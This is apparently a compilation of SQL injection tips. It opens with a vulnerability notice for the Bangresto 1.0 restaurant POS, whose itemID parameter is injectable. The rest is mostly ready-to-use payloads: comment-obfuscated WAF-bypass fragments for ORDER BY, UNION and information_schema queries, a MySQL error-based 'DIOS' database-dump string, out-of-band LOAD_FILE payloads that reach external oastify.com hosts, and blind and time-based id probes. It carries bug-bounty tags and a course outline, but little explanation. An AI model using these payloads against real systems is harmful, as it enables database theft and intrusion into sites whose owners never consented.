Bangresto 1.0 SQLi
Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
Description:
The itemID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the itemID parameter, and a database error message was returned.
An attacker can steal all information from the database of this application.
Category: web applications
Platform: php
Risk: [Security Risk High]
#SQL #Injection #Php
SQL Injection Bypass
If your target has a WAF, you should bypass that to access the database.
Let's start.
ORDER BY ->
/*!50000Order*/by
/*!50000order*//*!50000by*/
/*!50000OrdeR*/By
/*!50000ORDER*//*!50000BY*/
/**A**/Order by
Order/**A**/By
/**/**/ORDER/**/BY/**/**/
Null' order by
O0x72der b0x7920
Union ->
/*!50000union select
/*!50000Union*//*!50000Select*/
/*!12345union*//*!12345select*/
/**A**/union select
union /**A**/ select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
%23%0AUnion%23aaaaaaaaaa%0ASelect%23%0A1
+?UnI?On?+'SeL?ECT?
group_concat ->
group_concat(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
unhex(hex(group_concat(table_name)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
from table_name ->
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!50000frOm*/+/*!50000information_schema*/%252e/**/columns
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
#sqli #sql_injection
Advanced Error-Based MySQL 5.5 (DIOS)
/Bypass MySQL 5.5 version dump database error/
DIOS:
and(select+x*1E308+from(select+concat(@:=0,(select+count(*)from+information_schema.tables+where+table_schema=database()+and@:=concat(@,0x0b,table_name)),@)x)y)
#SQL #Dios #Bypass #POC
Advanced SQL Injection for AWAE
Goal is to master SQL Injection Discovery, Detection and Exploitation
Table of Contents:
- Learning a lil' bit of SQL
- SQL Injection Methodology Overview
- MYSQL Injection Methodology
- MySQL Error or UNION Based SQLi
- Routed Queries (Advanced WAF Bypass for Error or UNION based MySQLi)
- WorkAround when UNION queries don't work (MySQL Error Based SQLi)
- The Alternative ways of using AND/OR 0 in SQLi
- The Alternative ways of using NULL in SQLi
- The Alternative way of using WhiteSpace in SQLi
- MySQL Boolean Based Blind SQLi
- MySQL Time Based Blind SQLi
AND...
#Sql #Injection #AWAE
Time-Based SQL Injection
#SQL #Time_Based
Out-of-Band SQL Injection
Payload:
'11111111111' AND (SELECT LOAD_FILE('\\\\http://xde3imh45q8x9o4ovz1kea6cd3ju7kv9.oastify.com\\a'))
'11111111111' AND (SELECT CONCAT('', (SELECT SLEEP(5)), (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT 'http://14379q88wuz10svsm3so5exg47ayyqmf.oastify.com/a'))))))
#BugBounty #Tips #SQL
SQL injection ID parameter
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips